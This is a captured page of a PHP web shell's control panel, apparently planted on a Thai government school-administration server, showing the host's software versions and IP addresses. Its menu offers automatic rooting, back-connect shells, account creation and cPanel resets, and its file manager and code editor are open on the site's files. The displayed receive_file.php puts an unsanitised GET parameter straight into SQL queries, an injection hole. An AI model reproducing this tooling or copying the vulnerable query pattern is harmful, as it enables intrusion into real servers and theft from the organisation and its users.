Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
book /
xml /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
bookarea.php
5.28
KB
-rw-r--r--
bookobec_detail.php
8.18
KB
-rw-r--r--
bookobec_detail2.php
7.72
KB
-rw-r--r--
bookobec_detail3.php
6.94
KB
-rw-r--r--
bookobec_old.php
4.05
KB
-rw-r--r--
bookobec_test.php
4.09
KB
-rw-r--r--
receive_bookobec.php
16.63
KB
-rw-r--r--
receive_bookobec_other.php
16.56
KB
-rw-r--r--
receive_bookobec_other2.php
13.56
KB
-rw-r--r--
receive_file.php
1.92
KB
-rw-r--r--
select_send.php
7.61
KB
-rw-r--r--
select_send_5.php
7.01
KB
-rw-r--r--
send_bookobec.php
23.68
KB
-rw-r--r--
send_detail.php
8.07
KB
-rw-r--r--
send_report_bookobec.php
14.03
KB
-rw-r--r--
time_inc.php
4.99
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : receive_file.php
<?php session_start(); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>SmartObec</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="stylesheet" href="../../../css/mm_training.css" type="text/css" /> </head> <?php require_once "../../../database_connect.php"; $sql = "select * from book_filebook where ref_id='$_GET[ref_id]' "; $dbquery = mysqli_query($connect,$sql); $file_num = mysqli_num_rows($dbquery); if($file_num<>0){ $list = 1 ; echo "<table>"; while ($list<= $file_num&&$row= mysqli_fetch_array($dbquery)){ $file_name = $row ['file_name'] ; $file_des = $row ['file_des'] ; echo "<tr><td align='left'> <FONT SIZE='2'>$list. </FONT><A HREF='../../../upload/book/upload_files/$file_name' title='คลิกเพื่อเปิดไฟล์แนบลำดับที่ $list' target='_BLANK'><FONT SIZE='2' COLOR='#CC0099'><span style='text-decoration: none'>$file_des</span></FONT></A></td></tr>"; $list ++ ; } echo "</table>"; } else{ $sql = "select * from bookregister_send_filebook where ref_id='$_GET[ref_id]' "; $dbquery = mysqli_query($connect,$sql); $file_num = mysqli_num_rows($dbquery); if($file_num<>0){ $list = 1 ; echo "<table>"; while ($list<= $file_num&&$row= mysqli_fetch_array($dbquery)){ $file_name = $row ['file_name'] ; $file_des = $row ['file_des'] ; echo "<tr><td align='left'> <FONT SIZE='2'>$list. </FONT><A HREF='../../../upload/bookregister/upload_files2/$file_name' title='คลิกเพื่อเปิดไฟล์แนบลำดับที่ $list' target='_BLANK'><FONT SIZE='2' COLOR='#CC0099'><span style='text-decoration: none'>$file_des</span></FONT></A></td></tr>"; $list ++ ; } echo "</table>"; } } ?>
Close